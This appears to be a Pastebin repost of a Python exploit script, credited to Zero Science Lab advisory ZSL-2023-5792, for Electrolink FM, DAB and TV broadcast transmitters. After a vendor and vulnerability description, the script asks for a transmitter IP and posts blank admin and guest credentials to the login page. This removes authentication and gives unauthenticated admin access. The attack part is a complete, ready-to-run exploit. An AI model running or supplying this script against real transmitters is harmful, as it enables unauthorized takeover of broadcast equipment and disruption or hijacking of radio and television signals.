API tools faq
paste
Advertisement
FlyFar

Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal

FlyFar
Feb 2nd, 2024
817
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.22 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. #
  3. #
  4. # Electrolink FM/DAB/TV Transmitter Remote Authentication Removal
  5. #
  6. #
  7. # Vendor: Electrolink s.r.l.
  8. # Product web page: https://www.electrolink.com
  9. # Affected version: 10W, 100W, 250W, Compact DAB Transmitter
  10. #                   500W, 1kW, 2kW Medium DAB Transmitter
  11. #                   2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
  12. #                   100W, 500W, 1kW, 2kW Compact FM Transmitter
  13. #                   3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
  14. #                   15W - 40kW Digital FM Transmitter
  15. #                   BI, BIII VHF TV Transmitter
  16. #                   10W - 5kW UHF TV Transmitter
  17. #                   Web version: 01.09, 01.08, 01.07
  18. #                   Display version: 1.4, 1.2
  19. #                   Control unit version: 01.06, 01.04, 01.03
  20. #                   Firmware version: 2.1
  21. #
  22. # Summary: Since 1990 Electrolink has been dealing with design and
  23. # manufacturing of advanced technologies for radio and television
  24. # broadcasting. The most comprehensive products range includes: FM
  25. # Transmitters, DAB Transmitters, TV Transmitters for analogue and
  26. # digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
  27. # DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
  28. # switches, Manual patch panels, RF power meters, Rigid line and
  29. # accessories. A professional solution that meets broadcasters needs
  30. # from small community television or radio to big government networks.
  31. #
  32. # Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
  33. # touch-screen display and in-built state of the art DAB modulator,
  34. # EDI input and GPS receiver. All transmitters are equipped with a
  35. # state-of-the art DAB modulator with excellent performances,
  36. # self-protected and self-controlled amplifiers ensure trouble-free
  37. # non-stop operation.
  38. #
  39. # 100W, 500W, 1kW and 2kW power range available on compact 2U and
  40. # 3U 19" frame. Built-in stereo coder, touch screen display and
  41. # efficient low noise air cooling system. Available models: 3kW,
  42. # 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
  43. # with fully broadband solid state amplifiers and an efficient
  44. # low-noise air cooling system.
  45. #
  46. # FM digital modulator with excellent specifications, built-in
  47. # stereo and RDS coder. Digital deviation limiter together with
  48. # ASI and SDI inputs are available. These transmitters are ready
  49. # for ISOFREQUENCY networks.
  50. #
  51. # Available for VHF BI and VHF BIII operation with robust desing
  52. # and user-friendly local and remote control. Multi-standard UHF
  53. # TV transmitters from 10W up to 5kW with efficient low noise air
  54. # cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
  55. # and ISDB-Tb available.
  56. #
  57. # Desc: The application is vulnerable to an unauthenticated
  58. # parameter manipulation that allows an attacker to set the
  59. # credentials to blank giving her access to the admin panel.
  60. # Also vulnerable to account takeover and arbitrary password
  61. # change.
  62. #
  63. # Tested on: Mbedthis-Appweb/12.5.0
  64. #            Mbedthis-Appweb/12.0.0
  65. #
  66. #
  67. # Vulnerability discovered by Neurogenesia
  68. # Macedonian Information Security Research & Development Laboratory
  69. # Zero Science Lab - https://www.zeroscience.mk - @zeroscience
  70. #
  71. #
  72. # Advisory ID: ZSL-2023-5792
  73. # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php
  74. #
  75. #
  76. # 30.06.2023
  77. #
  78. #
  79.  
  80.  
  81. import datetime
  82. import requests
  83.  
  84. dt = datetime.datetime.now()
  85. dt = dt.strftime('%d.%m.%Y %H:%M:%S')
  86. nul = ''
  87.  
  88. print('Starting transmitter exploit at', dt)
  89.  
  90. ip = input('Enter transmitter ip: ')
  91. if 'http' not in ip:
  92.     ip = 'http://' + ip
  93.  
  94. ep = '/login.htm'
  95. url = ip + ep
  96.  
  97. signature = {'Accept-Encoding' : 'gzip, deflate',
  98.              'Accept-Language' : 'ku-MK,en;q=0.1806',
  99.                   'User-Agent' : 'Broadcastso/B.B',
  100.                   'Connection' : 'keep-alive'
  101.              }
  102. # ----------------- Line breaker v0.17 -----------------
  103. postd = {    'adminuser' : nul,
  104.              'guestuser' : nul,
  105.          'adminpassword' : nul,
  106.          'guestpassword' : nul
  107.          }
  108.  
  109. print('Removing security control...')
  110. r = requests.post(url, data = postd, headers = signature)
  111. if r.status_code == 200:
  112.     print('Done. Go and "Login".')
  113. else:
  114.     print('Error')
  115. exit(-4)
  116.            
Tags: Exploit Hack Vulnerability electrolink
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!